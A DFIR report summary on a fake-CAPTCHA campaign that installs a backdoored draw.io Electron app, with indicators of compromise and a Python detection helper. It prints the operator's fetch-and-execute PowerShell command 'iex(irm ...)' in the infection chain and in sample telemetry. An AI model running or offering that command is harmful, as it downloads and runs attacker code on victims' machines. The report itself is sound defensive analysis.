DFIR Forensic report, May 2026
The victim opened a fake CAPTCHA page, pasted the PowerShell command the page asked for, and from that point the host was compromised. The final payload is a modified draw.io Electron app: it looks like the legitimate diagram tool but ships a JavaScript backdoor injected into app.asar. On launch the backdoor does three things: registers itself for auto-start via setLoginItemSettings, beacons every 65 seconds to chimefusion.com over HTTPS, and accepts two kinds of orders — arbitrary JS eval or write-and-execute of base64 binaries received from the C2.
The operator did not write a custom Electron app. They took the legitimate draw.io v19.0.3 source and prepended ~70 lines of JavaScript at the top of the entry file. Those lines start a while(true) beacon loop, and because the loop never returns, draw.io's own initialization code that comes after never runs. The user-visible consequence is counterintuitive: the victim launches "draw.io" and sees no window. The process appears in Task Manager but with no UI. They likely think the app crashed, close the non-existent window, and forget about it. Meanwhile the RAT is already running and registered for auto-start.
Infection chain:
1. www.fepafut.com (compromised legitimate site) serves the fake CAPTCHA lure
2. iex(irm ccudmcx.xyz/u) pasted via Win+R
3. ccudmcx.xyz/update.zip (~110 MB, draw.io bundle) downloaded
4. %LOCALAPPDATA%\UpdateApp\ + Run registry key for persistence
5. chimefusion.com, beacon every 65 s, JSON over HTTPS

Indicators:
Network
- www.fepafut.com — compromised legitimate site serving the lure
- ccudmcx.xyz — operator-controlled NRD; serves /u and /update.zip
- chimefusion.com — C2 endpoint receiving the 65 s JSON beacon
Filesystem
- %LOCALAPPDATA%\UpdateApp\draw.io.exe
- %APPDATA%\setup.txt
- %LOCALAPPDATA%\Microsoft\Cache\demo.log
Registry
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\draw.io

This section documents — from the investigation's standpoint — what telemetry, artifacts, and controls would be relevant against a chain like this one. It is not a remediation guide nor an operational recommendation. Each organization applies its own judgment based on threat model, infrastructure, and policy.
Three artifact families distinguish a compromised host: network pivots (the three domains above), filesystem pivots (the three paths above), and the Run registry key used for persistence. Detection content includes Suricata rules matching HTTP host, URI and User-Agent, KQL queries that combine the iex(irm marker with the domain indicators, and behavioral EDR rules for Electron processes calling setLoginItemSettings from outside Program Files.
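As an added illustration of that detection content (this is editor-written example code, not the report's own Suricata/KQL rules), the following Python triage helper applies the report's indicators to constructed sample telemetry: it tags the pasted iex(irm command, the draw.io binary running from the %LOCALAPPDATA% drop path, the Run key value, and a fixed-interval 65 s connection pattern to the C2 host. The event field names (Image, CommandLine, TargetObject, Details) follow Sysmon conventions and are assumptions about the log source.

```python
import re
import statistics
from datetime import datetime

# Indicators below are the ones listed in the report; all telemetry is constructed.
C2_DOMAINS = {"www.fepafut.com", "ccudmcx.xyz", "chimefusion.com"}
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\draw.io"
CLICKFIX_RE = re.compile(r"\biex\s*\(\s*irm\s+", re.IGNORECASE)      # pasted lure pattern
DROP_RE = re.compile(r"\\UpdateApp\\draw\.io\.exe$", re.IGNORECASE)  # drop path from the report

def triage_process(event):
    """Tag one process-creation record (Sysmon event 1 style dict, assumed field names)."""
    tags = []
    cmd = event.get("CommandLine", "")
    if CLICKFIX_RE.search(cmd) and any(d in cmd for d in C2_DOMAINS):
        tags.append("clickfix_iex_irm")
    if DROP_RE.search(event.get("Image", "")):
        tags.append("drawio_outside_program_files")  # Electron app running from %LOCALAPPDATA%
    return tags

def triage_registry(event):
    """Tag a registry value-set record: Run key 'draw.io' pointing at the drop path."""
    if event.get("TargetObject") == RUN_KEY and DROP_RE.search(event.get("Details", "")):
        return ["run_key_persistence"]
    return []

def beacon_score(host, timestamps, expected=65.0, tolerance=3.0):
    """True when >=4 connections to a listed host repeat every ~expected seconds
    with low jitter, i.e. the fixed 65 s JSON beacon described in the report."""
    if host not in C2_DOMAINS or len(timestamps) < 4:
        return False
    ts = sorted(datetime.fromisoformat(t) for t in timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    return (abs(statistics.median(gaps) - expected) <= tolerance
            and statistics.pstdev(gaps) <= tolerance)

# Constructed sample telemetry (hypothetical host, not from the report's PCAP)
SAMPLE_PROC = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell "iex(irm ccudmcx.xyz/u)"'},
    {"Image": r"C:\Users\victim\AppData\Local\UpdateApp\draw.io.exe", "CommandLine": "draw.io.exe"},
    {"Image": r"C:\Program Files\draw.io\draw.io.exe", "CommandLine": "draw.io.exe"},
]
SAMPLE_REG = {"TargetObject": RUN_KEY, "Details": r"C:\Users\victim\AppData\Local\UpdateApp\draw.io.exe"}
SAMPLE_BEACON = ["2026-05-03T10:00:00", "2026-05-03T10:01:05", "2026-05-03T10:02:10",
                 "2026-05-03T10:03:16", "2026-05-03T10:04:20"]

def run_sample():
    """Run all three checks over the constructed telemetry and return the findings."""
    return ([triage_process(e) for e in SAMPLE_PROC], triage_registry(SAMPLE_REG),
            beacon_score("chimefusion.com", SAMPLE_BEACON))
```

The legitimate draw.io under Program Files produces no tag, which is the point of the path-based rule: the same binary name is suspicious only when it runs from the user-writable drop location.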
The full report covers the complete kill chain, MITRE ATT&CK mapping, Diamond Model attribution, PCAP analysis (including QUIC observations), full IOC tables, and detection rules in Suricata, KQL/Sentinel and Sigma format.
→ Read the full Spanish report for the complete investigation, charts, IOC tables, and detection rules.